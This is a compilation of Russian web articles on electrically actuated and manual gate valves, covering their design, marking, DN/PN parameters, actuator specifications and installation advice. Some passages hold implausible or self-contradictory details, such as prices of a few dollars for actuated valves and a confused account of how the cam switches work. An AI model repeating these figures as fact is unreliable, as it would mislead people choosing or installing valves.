Особенность конструкции и принцип управления задвижки с электроприводом

Устройство электропривода задвижки

   Клиновая задвижка по праву считается одним из наиболее распространенных и востребованных типов запорно-регулирующей арматуры.

Перекрывание течения рабочей среды осуществляется посредством клина, который перпендикулярно опускается между двумя седлами. Угол клина и угол седел должен быть идентичным.

Клин может приводиться в движение от гайки, которая крутиться вручную, или от привода. Наиболее практичным и удобным из сегодня существующих приводов является электропривод. Ему посвящена данная статья.

Обратите внимание

   Электропривод представляет собой сложный многокомпонентный механизм, целью которого является поступательно-возвратное воздействие на шпиндель запорной арматуры.

Шпиндель, соответственно, соединен с запорным элементом (клином).

Электропривод может использоваться не только для перевода арматуры между режимами «закрыто», «открыто», но и для регулирования положения (напора среды), для диагностики и определения положения, прочее.

   Устройство электропривода задвижки включает в себя: • электродвигатель. Является, пожалуй, главным компонентом привода. Выступает в качестве источника движения. Сегодня в приводах арматуры чаще всего используются электродвигатели переменного тока; • редуктор. Преобразует и передает вращение электродвигателя на шпиндель арматуры; • концевые и промежуточные выключатели.

Первые срабатывают при достижении шпинделем конечных положений «открыто», «закрыто». Промежуточные срабатывают при заданном положении запорного элемента (клина); • указатель положения и датчики привода. Указатель позволяет узнать степень открытости арматуры. Датчик выполняет схожую функцию, однако передает информацию на удаленные электронные устройства.

Это позволяет осуществлять дистанционное управление арматурой;

• блок управления. Позволяет реализовывать дистанционное управление посредством цифровых интерфейсов. Можно объединять приводы в сеть, если того требует технологический процесс.

   Устройство электропривода задвижки также имеет крепления к арматуре (обычно используются фланцы), электрические соединения, разъемы для подключения к промышленной сети (там, где развита АСУ ТП).

Виды электроприводов задвижек

   Важным моментом эксплуатации электроприводов является безопасность. В первую очередь это касается взрывоопасности: • рабочей среды; • технологических процессов на предприятии;

• окружающего пространства в общем.

   По взрывоопасности существует два основных типа приводов:

• общепромышленные. Они используются на взрывобезопасных производствах. Здесь устройство электропривода задвижки оборудуется пылевлагозащитой, защитой от коррозии. Также учитывается максимальный перепад температур в окружающей среде. Чем сложнее условия эксплуатации, тем сложнее конструкция. Вместе с тем производитель старается не перегружать устройство электропривода задвижки излишними деталями, чтобы это не сказалось на производительности. Такой тип привода используется для любых негорючих сред (жидких, газообразных, абразивных);
• взрывозащищенные. Здесь устройство электропривода задвижки сложнее общепромышленных. В частности, применяется электрооборудование, которое безопасно контактирует с горючими средами (неспособное вызвать взрыв). Может использоваться муфта ограничения крутящего момента. Используются в нефтегазовой, нефтеперерабатывающей промышленности, на шахтах, рудниках.

Монтаж электропривода

   Установка электропривода сложнее установки задвижки. Чтобы смонтировать арматуру в трубопровод, достаточно соединить фланцы или приварить. Для монтажа электропривода необходимо знание принципиальной схемы электросети на предприятии, правильный подвод проводов и правильное подключение в соответствии со всеми нормами.

Особое внимание следует уделять подключению информационного кабеля, по которому информация подается на блок управления. Устанавливать электропривод можно не только непосредственно на задвижке, но и на некотором отдалении от нее. Такая возможность значительно облегчает жизнь в труднодоступных неудобных местах.

Доверять монтаж рекомендуется квалифицированным специалистам, которые знают устройство электропривода задвижки.

   Завод «Адмирал» занимается изготовлением задвижек для различных сфер применения. Мы предоставляем услуги по доработке под конкретный объект, а также выполняем индивидуальные заказы.

   Задвижки могут комплектоваться электроприводами/редукторами по желанию заказчика. От правильности выбора зависит надежность и длительность бесперебойной эксплуатации задвижки.

На наших задвижках используются электроприводы производства AUMA и Тулаэлектропривод. Данные компании пользуется репутацией надежных поставщиков электротехнической продукции.

Срок службы колеблется от 5 для червячных, ползунковых до 12 – для цилиндрических.

Источник: https://admiralzavod.ru/ustrojstvo_jelektroprivoda_zadvizhki

Электрозадвижки для трубопроводов: схема подключения, установка и управление

Современный монтаж запорной арматуры, в подавляющем большинстве случаев, ведется с применением электрозадвижки для трубопроводов. Особенно в системах трубопроводов воды, нефти и газа. Связано это с тем, что механические задвижки в современных условиях уже морально устарели.

А возможность перекрывать поток через трубопровод дистанционно, гораздо удобней, экономичней и быстрее, чем непосредственное перекрывание вентиля.

Это дает возможность строить сложные автоматизированные системы управления потоками жидкости или газа в разных направлениях промышленности или водоснабжения.

Принцип работы электрозадвижки

В конструктивном исполнении существует несколько видов задвижек:

  1. Клиновые. Плоская заглушка перекрывает поток перпендикулярно, как бы вбивается клин.
  2. Поворотные. Заслонка располагается в самой трубе и при ее повороте поток перекрывается.
  3. Параллельные. Делятся на одно- или двух кольцевые. Поток перекрывается после опускания дисков в специальные углубления.
  4. Шланговые. Затвор осуществляется путем сильного сжатия шланга.

В большинстве случаев при работе электропривода используется клиновое исполнение задвижек

Чтобы из механической задвижки сделать задвижку с электроприводом, достаточно к существующей конструкции добавить асинхронный двигатель и червячный редуктор. Вращение вала передается на редуктор, который приводит в движение задвижку.

Рис.

1: Червячный редуктор

Использование электропривода позволяет дистанционно управлять процессом отпирания/запирания заглушек, что получило широкое применение во многих сферах.

Рис.

2: Внешний вид электрозадвижки

В зависимости от параметров системы на конечный выбор конструкции электрозадвижки будет влиять следующие факторы:

  • агрессивность среды потока
  • рабочее давление в системе
  • условия окружающей среды
  • необходимые системы защиты и безопасности.

Электрозадвижка всегда дублируется в механическом исполнении на случаи отсутствия питания. Для переключения на ручной режим на месте расположения трубопровода и задвижки выносят элементы управления переключением на ручной режим работы.

Блок схема устройства электрозадвижки показана на рис. 3.

Рис.

3: Блок схема управления задвижкой

Приводы оснащаются концевым выключателем с помощью которого регистрируются положения задвижки и поступают сигналы в систему управления по достижении ей крайних положений.

Муфта ограничения крутящего момента позволяет обезопасить трубопровод от повреждений при заклинивании задвижки или попадании в место перекрытия посторонних предметов, предотвращает повреждение всей системы.

Электрическая схема подключения электрозадвижки в общем виде без системы контроля датчиков давления или сложной системы управления электроприводом выглядит следующим образом:

Рис.

4: Электрическая схема подключения электропривода

На данной схеме сигналы с концевых выключателей останавливают работу двигателя, и задвижка находится или в состоянии «открыто» или «закрыто».

Материалы изготовления электрозадвижек

Изготавливаются задвижки из следующих видов металлов:

Наибольшее распространения получили исполнения из стали из чугуна, как наиболее надежные в работе способные прослужить достаточно долго без нареканий, что и является основным критерием выбора. Исполнения из бронзы и латуни зачастую используются в специфических системах трубопроводов, где значения выбора материала изготовления задвижек имеет большое значение.

В чем преимущество использования электрозадвижек?

Очевидным преимуществом использования электрозадвижек является возможность дистанционного управления системой, особенно это получило распространение на пожарных водопроводах.

В это входит не только понятия открывание и запирание потоков, но и регистрация нештатных ситуаций и предотвращение аварийных ситуаций.

Стоимость электрозадвижки хоть и выше, чем стандартной механической, но получаемые преимущества быстро окупают все расходы в процессе эксплуатации.

Также обеспечиваются другие преимущества:

  • возможность монтажа трубопроводов в труднодоступных местах, где не будет необходимости постоянно осуществлять управление системой непосредственно на трубопроводе.
  • быстрое реагирования на текущую ситуацию.
  • значительно более быстрое отпирание/запирание больших диаметров труб, в сравнении с ручными задвижками.
  • возможность построения сложных трубопроводных систем, в том числе автоматических без участия оператора.

Классификация задвижек с электроприводом

С распространением использования запорной арматуры в начале 19 века была разработана и принята таблица фигур запорной арматуры.

В ней были установлены ряд правил для более легкого и удобного чтения и обозначение различных исполнений запорной арматуры.

Так как задвижка — это только один из видов запорной арматуры имеет смысл указать как будет выглядеть маркировка задвижек с электроприводом, на примере 30с941нж.

Рис.

5: Задвижка 30с941нж

«30» – обозначает непосредственно тип арматуры, а именно задвижки.

«с» – обозначает материал из которого изготовлен корпус запора, в данном случае сталь углеродистая.

«9» – тип используемого привода, в данном случае электромоторный.

«41» – обозначает номер изделия на заводе-изготовителе.

«нж» – материал уплотнителя, нержавеющая сталь.

Остальные типы маркировки указаны на рис. 6.

Рис.

6: Таблица фигур запорной арматуры

Другим важным параметром при выборе задвижки является DN (или ДУ). DN принятый современный стандарт обозначения условного прохода. ДУ (диаметр условный) устаревшее название, постепенно выходящее из оборота. Условный проход обозначает внутренний диаметр трубы, выраженный в миллиметрах. Например, DN50 (или ДУ50) обозначает трубу с внутренним диаметром в 50 мм. Условным размер называют не случайно, т.к.

Важно

при изготовлении труб выдержать точные размеры внутреннего диаметра не имеет экономического смысла, поэтому он может в небольших пределах варьироваться, однако считать этот размер точным нельзя.

Не менее важным является параметр PN (или РУ) обозначающий предел давления, при котором обеспечена нормальное функционирование устройства. Например, PN15 означает, что данное изделие гарантирует функционирование при давлении в системе в 15 Бар.

Соответственно в зависимости от исполнения задвижки и диаметра трубы на котором она будет использоваться осуществляется подбор типа электропривода к данной задвижке. Разница в использовании электропривода на трубу с ДУ50 и ДУ600 очевидна, поэтому на один и тот же тип задвижки может выбираться разный электропривод.

Из отечественных изготовителей приводов самыми распространенными являются изделия заводов ОАО «ЗЭиМ» и ОАО «Тулаэлектропривод». Наибольшее распространения получили двигатели серии ПЭМ-А11 использующиеся на самые распространенные размеры труб от ДУ50 до ДУ150.

Виды электрозадвижек и систем управления

По системам управления электроприводами различают несколько типов:

  • Многооборотные. Элекрозадвижки способные запирать поток не только в двух положениях открыто/закрыто, а с возможностью контроля потока еще в нескольких промежуточных положениях.
  • Взрывозащитные. Системы с усиленной конструкцией на случай возникновения нештатных ситуаций. Используются в основном в системах с взрывоопасными жидкостями. В основном нефтяной, химической и газовой промышленности.
  • Интегрированные. Задвижки, оборудованные системой датчиков контроля состояния потока. Способные в автоматическом режиме менять положение задвижке в зависимости от текущей ситуации в арматуре.

Правила установки и регулировки

Перед началом установки задвижки в обязательном порядке необходимо убедиться в ее корректной работе. Для этого клин необходимо нанести смазку на силиконовой основе, если она отсутствует, то пролить обычной водой. Потом необходимо провести ее до состояния закрытия и вернуть в открытое состояния до упора.

Убедившись, что проверка на работоспособность задвижки прошла успешно на полном цикле в ручном режиме и при работе электропривода. Убедитесь, что в трубопроводе отсутствуют посторонние предметы и приступайте к ее монтажу.

Если выяснится, что заслонка не работает после монтажа это приведет не только к экономическим, но и моральным неудобствам.

Также до установки убедитесь, что изделие вам подходит по всем параметрам, если с ДУ будет трудно ошибиться, то вот значение PN обязательно необходимо проверить. Этот параметр должен обязательно соответствовать условиям эксплуатации.

Крепление задвижки к ответному фланцу должно осуществляться болтами определенного диаметра, в зависимости от ДУ оно меняется. Их значения приведены в таблице ниже.

Рис.

7: Таблица рекомендованных диаметров болтов для крепления задвижек в зависимости от значений диаметра трубы и давления в системе

Количество болтов крепления и их расположения фланцевых отверстий должны соответствовать ГОСТ 12821. Далее устанавливаете электропривод и производится окончательная установка и монтаж систем управления.

Срок службы и рекомендации по эксплуатации

Гарантийный срок стандартных задвижек составляет 2 года, срок службы – 10 лет. Средний ресурс не менее 2500 циклов.

При верно выбранном значении PN и бережной эксплуатации изделия без чрезвычайных ситуаций прибор может прослужить исправно гораздо дольше.

Крайне не рекомендуется обслуживать изделие персоналу не обученном работе, настройке и эксплуатации задвижек. В случае если в системе возможны запредельные значения давления, необходимо установить в ней опоры или компенсаторы.

Совет

Нельзя использовать арматуру в качестве опоры для трубопровода, это сильно уменьшает срок эксплуатации прибора. Запрещено менять набивку сальника или осуществлять его до набивку.

Источник: https://ZnatokTepla.ru/truby/printsip-raboty-elektrozadvizhek.html

Задвижка с электроприводом

Задвижка с электроприводом – современное запорное устройство, которое успешно применяется в системах горячего и холодного водоснабжения, а также и в других.

К примеру, кондиционирование и отопление и иные технологичные системы, где не предусмотрено использование агрессивных жидкостей, нуждаются в таких запорах, поскольку именно такое решение позволят добиться максимально эффективной работы.

 Кроме всего вышесказанного, задвижка с электроприводом позволяет настроить работы в ручном и в автоматическом режимах, зачастую даже с дистанционным управлением, что, несомненно, удобно и безопасно.

Выбор типа привода (с пружиной или без) осуществляется в строгом соответствии с требованиями конкретной системы, однако есть и другие параметры, влияющие на него: перекрываемое давление, условия окружающей среды, наличие управляющего сигнала и т.д.

Принцип работы задвижки, оснащенной приводом

Задвижка с электроприводом работает по известному и простому принципу поворотного диска, в задачи которого вменяется своевременное и надежное сдерживание потока воды или другой жидкости.

Так, диск занимает строго перпендикулярное положение относительно оси потока, причем делает это после получения соответствующего сигнала.

В разных конфигурациях возможны варианты оснащения возвратной пружиной, но есть модели и без нее.

Обратите внимание

Рабочий механизм расположен внутри корпуса, состоит он из двух (как правило) седел, установленных либо параллельно, либо под углом относительно друг друга. Для надежности в положении «закрыто» присутствуют специальные уплотнители, которые осуществляют дополнительную герметизацию затвора.

Сам затвор также движется, только само движение осуществляется за счет штока или шпинделя (в разных моделях отличается). Шпиндель же в комплекте с ходовой гайкой – это не что иное, как резьбовая пара, в задачи которой вменяется осуществление рабочего перемещения самого затвора в необходимых вариантах.

Используемые материалы

Как правило, производители предлагают базовые материалы, из которых по технологии могут изготавливаться задвижки:

  • Сталь (нержавеющая и оцинкованная)
  • Чугун 
  • Латунь
  • Бронза

Все материалы имеют свои достоинства и недостатки, но на работу самой задвижки в технологическом смысле материал изготовления не влияет.

Руководствуясь теми или иными соображениями, можно выбирать латунные или бронзовые варианты только лишь при существующих жестких ТУ системы, к тому же, задвижки из этих материалов производители предлагают в муфтовом исполнении.

Такой тип запорных узлов с электроприводом имеет гораздо более скромное распространение, а это значит, что и выбирают их реже, чем чугунные и стальные. Имеет значение и стоимость, и надежность в работе, и отсутствие различных нареканий.

Варианты приводов

Электрические приводы, который используются в данном типе арматуры, производятся в условиях современного производства. Жесткие ГОСТы подразумевают:

  • определенные климатические параметры, 
  • высокий уровень защиты от взрыва, 
  • муфту, которая имеет ограничение крутящего момента и бывает разных типов.

Во многом выбор привода обусловлен тем, где будет работать конструкция – в помещении, под навесом или же под открытым небом.

Климатические особенности, соответствующие ГОСТу 15150-69, отображаются в маркировке:

  • температурные параметры от плюс сорока градусов и до минус сорока пяти обозначаются литерой «У» с цифрами 1 или 2;
  • температура от + 40 до – 60 имеет иную маркировку – УХЛ и цифрами 1 и 2;
  • температура от + 50 до минус десяти – литера «Т» с цифрами 1 и 2. 

При этом существует и определенный запас, ведь испытания подтверждают отличные показатели работы электроприводов УХЛ1 и УХЛ2 в задвижках при температурном пороге в – 70 градусов, точно также, как приводы Т1 и Т2 работают при + 60 оС. Узел с электроприводом отвечает за свой участок работы, однако он всегда важен в общем списке поставленных задач.

В современных приводах существует два типа управления – ручное механическое и дистанционное при помощи пульта. И то, и другое управление обладают надежностью, а различаются лишь некоторыми производственными особенностями и комфортом.

Электропривод в задвижке отвечает за такие действия:

  • Своевременно закрыть и открыть механизм, удерживать его в промежуточных положениях, если этого требует технологический процесс. 
  • Автоматически отключать узел в случае аварийных ситуаций, а также при достижении крайних положений.
  • Сигнал на пульте (в случае с дистанционным управлением), оповещающий о крайнем положении запорного устройства задвижки. 

Задвижка с электроприводом, которая подобрана точно под стандарт, обладает не только надежностью, но и удобством в эксплуатации, без чего невозможна нормальная эксплуатация.

Помимо качественных материалов и технологий современный потребитель всегда выбирает отличные эксплуатационные качества и приемлемые цены.

Где применяются задвижки с электроприводом

Основное место применения  – это системы водопроводов, кондиционирования, отопления и прочие, где в обязательном порядке необходимо автоматизировать процесс, а также добавить к этому возможность удаленного управления. Зачастую автоматический режим необходим и там, где такие узлы устанавливаются в сложных в обслуживании труднодоступных местах.

Задача выбора конкретной модели осложнена, если доступ к ней затем будет ограничен, то есть, необходимо выбрать наиболее подходящий вариант, рассчитать срок беспроблемной работы задвижки. Если техническое обслуживание будет очень сложным, то оно, несомненно, будет экономически невыгодным, что сделает всю сеть, в которой установлена задвижка, нерентабельной.

Еще один параметр, который обязательно требует именно такой конструкции – системы с большими диаметрами условного прохода.

Здесь подразумевается, что для открытия и закрытия совершается впечатляющее количество оборотов, а значит, нет возможности обеспечить быстрое перекрытие потока.

Автоматизация в данном случае позволит отстроить работу всей систем ы в нужных границах, что приведет и к экономической эффективности, и к соблюдениям существующих норм безопасности.

Технические характеристики

Наименование параметра Значения параметров
Тип задвижки 30с941нжДу 50 30с941нжДу 80 30ч906брДу 100 30ч906брДу 150 30ч906брДу 200
с электроприводами производства ОАО «ЗЭиМ»
Марка электропривода ПЭМ-А11 ПЭМ-Б5
Диапазон настройки крутящего момента на выходном валу, Н.м. 70 – 110 100 – 300
Число оборотов выходного вала, об., min – max 10 – 45 6 – 45
Частота вращения выходного вала, об./мин. 24 ± 4,8 50
Напряжение и чистота питания 380 В, 50 Гц
Мощность электродвигателя, Вт 250 1100
Масса электропривода, кг, не более 22 41
Степень защиты IP 55
с электроприводами производства ОАО «Тулаэлектропривод»
Марка электрического привода Н-А2-11 Н-Б1-11
Номинальный крутящий момент на выходном валу 60 – 100 100 – 300
Число оборотов выходного вала, об., min – max 10 – 45 6 – 36
Частота вращения выходного вала, об./мин. 24 50
Напряжение и чистота питания 380 В, 50 Гц
Мощность электродвигателя, Вт 250 1700
Масса электропривода, кг, не более 17 53

 

Схема задвижки с электроприводом

Вернуться обратно 

Источник: http://energomatica.ru/zadvizhka-s-elektroprivodom.html

Технические характеристики задвижек с электроприводом

Задвижка с установленным электроприводом представлена в виде трубопроводной арматуры, в которой запор способен перемещаться перпендикулярно оси потока рабочей среды.

Устройство снабжено электроприводом, который приводит в действие запорный механизм.

Применение и особенности

Задвижка с электроприводом (с условным ДУ50), в большинстве случаев, широко применяется в сфере водоснабжения. Электропневматический вентиль ВВ 32, так же, как его аналоги, устанавливают в насосы различных конфигураций, смесители и канализационные станции. Шкаф управления контролирует затвор агрегата, качество параметров электричества на вводе. 

Помимо этого, задвижки ДУ 100 электроприводные получили широкое применение в различных системах, осуществляющих переработку сточных вод и проводящих постоянную транспортировку питьевой воды.

Стальная задвижка реечная с электроприводом может использоваться при обеспечении полной автоматизации погружных насосов.

Важно

В таких случаях электропневматический вентиль способствует точной регулировке скорости и давления потока. Шкаф управления приводом формирует абсолютно точные сигналы управления и работой вентиля.

Кроме того, вентиль с электроприводом при активном использовании, позволяет регулировать количество потребляемой воды. На затвор может использоваться дистанционная колонка для управления потоком.

О видах и отличиях

Стальная задвижка 30С941НЖ с работающим электроприводом, включенная в систему орошения или пожаротушения, способна с точностью контролировать уровень подачи воды, исходя из заданного изначально режима.

Задвижки ДУ80 электроприводные способствуют автоматическому распределению нагрузок во время работы скважины.

После того, как механизм с электроприводом ДУ50 будет установлен в системе станции по перекачке и добыче воды, появится возможность для стабильной подачи строго фиксированных объемов воды в накопительный бак. Колонка дистанционного управления облегчит управление устройством.

Помимо прочего, стальная конструкция устроена таким образом, что при осуществлении управления над ней, энергопотери сводятся к минимуму.

Стоит отметить, что цена задвижки 30С941НЖ с установленным электроприводом вполне приемлема, и колеблется в малозначительных пределах (4-5 $).

Задвижка с колонкой для управления на глубине

Однако перед тем как купить задвижку 30ч906бр с электроприводом ДУ50, желательно представлять, как именно она устроена и зачем необходима.

Схема управления задвижкой 30ч906бр  с электроприводом являет собой автоматизированный вариант запорно-регулирующего арматурного узла, когда вместо человека работу по изменению степени открытия выполняет привод.

Совет

Задвижки ДУ200 электроприводные в большинстве случаев способны выполнять два вида команд – закрыть и открыть. 

Стальная задвижка 30С941НЖ ДУ50 с электроприводом способна выполнять такие функции с ориентировкой на общее состояние управляемых органов (насосов, вентиляторов).

Электрозадвижка Auma действует при изменении показателей контролируемых параметров.

Это может быт уровень рабочего вещества в системе, показатели давления, температуры среды, расхода жидкости.

Управление задвижкой 30ч906бр с электроприводом широко применяется благодаря предельной простоте процесса. Однако, колонка ручного управления также удобна, проста и надежна. 

Кроме того, цена на  задвижки электроприводные ДУ50, ДУ80, ДУ 100 и ДУ200 вполне доступна (25-35 $), и приобрести устройство можно сейчас практически везде.

В качестве электропривода задвижки 30ч906бр выступает асинхронный двигатель. Его выходной вал соединяется напрямую с червячным редуктором.

Устройство снабжено выходной шестерней, которая посредством связи с червячным редуктором сцепляется с выходным винтом агрегата.

Обратите внимание

Электрозадвижка 30Ч906БР ДУ 100 стальная по своим характеристикам, позволяет во время работы электродвигателя поднимать или опускать затвор и винт.

Далее, при помощи выходной шестерни редуктора, посредством передачи движения через промежуточный редуктор вращение передается нескольким дискам, оснащенным кулачками.

При открытии изделия происходит автоматический поворот кулачков в правую сторону,  в результате шиберный затвор приходит в движение и стальная задвижка 30Ч906БР закрывается. Это приводит к тому, что контакты микровыключателя замыкаются и происходит захлопывание устройства.

Дело в том, что диски, снабженные кулачками, устроены таким образом, что при полном открытии изделия они способствуют срабатыванию выключателя.

Также, для удаленного механического управления, применяется дистанционная колонка управления. Она устанавливается снаружи на открытом пространстве, для нее ненужен шкаф управления. Колонка передает усилие на задвижку, которая устанавливается на глубине.

Технические характеристики задвижки с электроприводом ДУ 100 позволяют, с ориентировкой на особенности электрической принципиальной схемы, иметь три режима управления устройством. Это:

  • Дистанционный режим (когда применяется колонка для ручного управления);
  • Автоматический режим (применяется шкаф управления приводом);
  • Наладочный режим.

В большинстве случаев дистанционный режим применяется при необходимости контроля над электроприводом на 30ч906бр на расстоянии.

Задвижка со встроенным электроприводом очень функциональна

Это может производиться, к примеру, с диспетчерского пульта. Ключевая особенность представленной трубопроводной арматуры – это присутствие электропривода, который берет на себя функцию элемента управления.

Задвижки в большинстве своем имеют одинаковое внутреннее устройство, но различаются по разновидностям приводов. Схема различия устанавливается исходя из:

  • Типа управления – применяется как дистанционный, так и местный вид привода;
  • Способа крепления к задвижке – посредством штепсельного разъема или сальникового ввода;
  • Конструктивного исполнения, типа и размера привода, в зависимости от технических особенностей задвижки.

Общая конструкция, как задвижки ДУ80 и ДУ 100, так и ее электропривода практически во всех случаях представлена в виде полнопроходного варианта.

Это означает, что диаметр и размер ее рабочего сечения не имеет различий с размерами и диаметром трубопроводной магистрали.

Благодаря такому соответствию обеспечивается довольно надежное, эффективное и герметичное перекрытие рабочего вещества, которое передвигается по трубам.

Важно

Однако, описанная особенность, наряду с этим обуславливает узкие рамки сферы применения данного агрегата.

Задвижки используются только в тех случаях, когда требуется полное перекрытие канала подачи рабочей среды в трубопроводной магистрали.

При осуществлении открытия, представленные изделия способны только полностью открыть проход в трубе – течению вещества ничего не препятствует.

Противопоказано применение задвижек с целью регулировки напора воды или скорости течения. Это может привести к формированию гидравлических ударов, что со стопроцентной вероятностью выведет агрегат из строя.

Характеристики, плюсы и минусы

Технические характеристики задвижки с установленным электроприводом отличаются исходя из разницы в моделях и комплектации.

Для подключения запорного устройства, стальная задвижка оборудована электроприводом, применяются стандартные задвижки и из других материалов. Необходим шкаф управления приводом.

Во всех модификациях устройства установка электроприводов осуществляется на верхнем фланце бугельного защитного кожуха (крышки).

Устанавливаемые электродвигатели способны вращаться с частотой в 1400 об/мин, при этом мощность мотора колеблется в пределах 1-1,5 квт.

Время, за которое может производить открытие шиберный затвор, составляет от 1,2 до 3 минут.

Все электроприводы изготовлены с расчетом на несанкционированные перепады напряжения в сети, за это также отвечает шкаф автоматического управления приводом.

Это обеспечивается благодаря применению специального обвода. Его открытие производится непосредственно перед запуском электродвигателя.

Совет

При этом, все ключевые особенности устройства, например, форма корпуса, конструкция и принцип работы запорной части, соответствуют всем параметрам задвижек с ручным типом управления.

Стоит отметить, что мощность электропривода с установленным на нем электродвигателем составляет 1 квт.

Задвижка с электроприводом и ручным дублером

Благодаря всем этим характерным особенностям, устройства задвижка 30с964нж может применяться как в домашних трубопроводных системах, так и магистралях, по которым подается горячая вода или пар. Положительными качествами данного изделия можно считать:

  • Высокую устойчивость к коррозийным процессам;
  • Слабое гидравлическое сопротивление;
  • Высокую прочность;
  • Высокую частоту вращения электропривода;
  • Малый расход материала при монтаже – схема требует всего два кабеля;
  • Легкость в эксплуатации, ремонте и техническом обслуживании;
  • Может применяться колонка для дистанционного управления агрегатом;
  • задвижка 30с964нж абсолютно экологична.

Однако подобные изделия обладают рядом недостатков. К ним можно причислить:

  • Зависимость электропривода устройства от постоянного источника питания, необходим электрический шкаф для подключения;
  • Малая сопротивляемость потоку рабочей среды (в некоторых модификациях);
  • Склонность к разгерметизации при применении низкокачественных уплотнительных материалов.

Как выбрать?

Перед тем, как выбрать и купить задвижку, снабженную электроприводом, необходимо детальным образом учесть все ее эксплуатационные характеристики.

Прежде всего, нужно обратить внимание на условия, в которых планируется эксплуатация устройства.

Сюда относится температурный режим и схема уровня давления в магистрали. Пропускная способность изделия через затвор также важна – для бытовых целей данный показатель может быть самым низким.

Особое значение имеет диаметр и рабочий размер фланцев, который сопоставляется с такими же показателями трубопровода.

Стоимость такого вида запорной арматуры колеблется в небольших пределах (25-30 $), и напрямую зависит от конструктивных особенностей, ДУ и фирмы-изготовителя.

Фланцевая задвижка с электроприводом

Задвижка с установленным электроприводом, SFG-432:

  • Рабочая среда: вода, пар;
  • Максимальная температура рабочей среды: +425 °C;
  • Рабочее давление: 16 бар;
  • Материал корпуса: сталь;
  • Цена: 25-35 $.

Задвижка с установленным электроприводом, RTP-900:

  • Рабочая среда: масла, нефтепродукты;
  • Максимальная температура рабочей среды: +350 °C;
  • Рабочее давление: 14 бар;
  • Материал корпуса: сталь;
  • Цена: 40-45 $.

Задвижка с установленным электроприводом, СМР-34:

  • Рабочая среда: вода, пар, масла;
  • Максимальная температура рабочей среды: +400 °C;
  • Рабочее давление: 16 бар;
  • Материал корпуса: чугун;
  • Цена: 35-40 $.

Монтаж электропривода и задвижки (видео)

Нюансы монтажа

При монтаже следует избегать воздействия изгибающих, крутящих или растягивающих усилий со стороны присоединяемого водопровода и на затвор.

Установка фланцев производится параллельно фланцам трубопровода как для задвижек ДУ50, ДУ 100, так и большего диаметра трубопровода  чем 100 мм. Под задвижкой устанавливается неподвижная временная платформа, для избегания нагрузки на входные патрубки изделия.

Все этапы установки задвижки производятся в строгом соответствии с настоящей инструкцией и ориентировкой на схему рабочего проекта трубопроводной системы.

Источник: http://HomeBuild2.ru/truby/zadvizhka-s-elektroprivodom.html

Задвижка с ручным приводом: устройство, принцип работы, преимущества

Задвижка клинового типа, зачастую используются в качестве основного элемента при монтаже системы трубопровода. Его принято использовать в тех местах, где необходимо своевременное полное или частичное перекрытие потока.

Для перекрытия используется специальный запирающий элемент, который способен совершать поступательные и возвратные движения. Двигаться он будет перпендикулярно основному потоку. Положения у него всего два – «закрыто» и «открыто».

Особенности и принцип работы оборудования

К такому типу оборудования следует отнести запорные механизмы, в которых перекрытие основного прохода осуществляется посредством перемещения затвора в нужном направлении – перпендикулярно основному рабочему потоку. Задвижки также используются для перекрытия основного потока не только жидких, но и газообразных сред, при этом диаметр используемой трубы может составить 5-200 см.

К тому же допускается температурный режим в 450°С. Возможно изготовление и более стойкой арматуры, но только по специальному заказу. При транспортировке газообразных жидкостей при обустройстве устья скважин, на сборных пунктах, распределительных и магистральных трубопроводах, газораспределительных и компрессионных станциях.

Если проводить сравнение с другими разновидностями арматуры запорного типа, задвижки имеют ряд неоспоримых преимуществ:

  1. подача рабочей среды может осуществляться в любом направлении;
  2. строительная длина весьма небольшая;
  3. простота последующей эксплуатации;
  4. возможность перекрытия потока рабочей среды, состоящей из достаточно вязкой жидкости;
  5. полное отсутствие каких-либо поворотов;
  6. низкий показатель гидравлического сопротивления даже при условии полностью открытого прохода.

Недостатки также имеются, и к ним следует отнести:

  1. сложность выполнения каких-либо ремонтных работ;
  2. существенные габариты, в частности речь идет о высоте;
  3. возможность образования сильного гидравлического удара в конце хода;
  4. скорость срабатывания затвора невысокая;
  5. несущественный перепад в показателях давления;
  6. при наличии в среде кристаллизирующихся включений, их транспортировка считается невозможной.

Комплектующие

Рабочая полость задвижки, в которую попадает жидкость при транспортировке, именуется корпусом, который закрывается при помощи крышки. Прокладки отвечают за необходимый показатель герметизации, которые прижимаются при помощи крышки.

Корпус представляет собой набор отдельных элементов, однако может встречаться сварная, литая и цельная конструкция. Задвижка по высоте должна быть кратной двум диаметрам перекрываемого прохода.

Патрубки же будут расположены симметрично оси шпинделя, с помощью которых производится присоединение задвижки к системе трубопровода. Типы соединения могут быть фланцевыми или сварными.

Два кольцевых седла располагаются во внутренней части корпуса и имеют собственные затворы, которые представлены в виде клина с поверхностями, наплавленными уплотнительными кольцами. Если устройство находится в закрытом положении, то уплотнительные элементы будут прижиматься к поверхностям колец, расположенных на корпусе и идущих от привода.

Задвижка, в большинстве случаев, будет состоять из:

  1. редуктора, маховика или электрического привода;
  2. шпинделя представленного в виде резьбового штока (стального);
  3. крышки латунной, стальной или чугунной;
  4. корпуса латунного стального или чугунного;
  5. одного из разновидностей запорного элемента.

Классификация приборов

Исходя из конструктивных особенностей, встречаются два типа:

  1. Двухдисковая параллельная задвижка. Способ присоединения используется фланцевый, а в качестве основного материала при его изготовлении принято использовать сталь или чугун. Шток может быть выдвижного или не выдвижного типа. Между запорными элемента расположен уплотнительный материал, который и делает устройство герметичным. Задвижки параллельного типа используются в том случае, если показатель давления несущественный. В этом случае показатель не будет достигать отметки в 10 бар.
  2. Ножевая или шиберная задвижка. Часто используется в случае обустройства систем, транспортирующих вязкие, сыпучие или другие материалы. Также используется в пищевой и химической промышленности, системах водоотведения. Задвижки шиберного типа изготавливаются межфланцевым методом. Именно поэтому показатель металлоемкости у них небольшой, что привело к весьма приемлемой стоимости. Предполагается использование полнопроходного исполнения, при котором использоваться будет безсальниковый материал уплотнителя. Показатель надежности герметического перекрытия находится на оптимальном уровне, что делает перекрытие самого рабочего потока надежным. Возможно использование только при условии невысокого рабочего давления. Корпус может изготавливаться из стали или чугуна. В зависимости от рабочих параметров, седло ножа будет изготовлено на основе одного из многочисленных полимерных материалов.

Тип управления

При выборе ручного типа управления задвижками, в котором диаметр прохода составит порядка 15 см, принято использовать маховик. Если диаметр прохода будет больше, то рекомендуется отдать предпочтение редукторам. При необходимости можно полностью автоматизировать весь процесс, используя автоматические приборы, которые позволяют проводить управление удаленным способом.

В этом случае проход составит 50 см и более, при условии размещения в труднодоступных местах. Для того, чтобы открыть имеющийся проход, электрическому приводу понадобится совершить огромное количество оборотов, что делает возможным использование механизмов средней мощности. При этом быстро закрыть или открыть проход не получится.

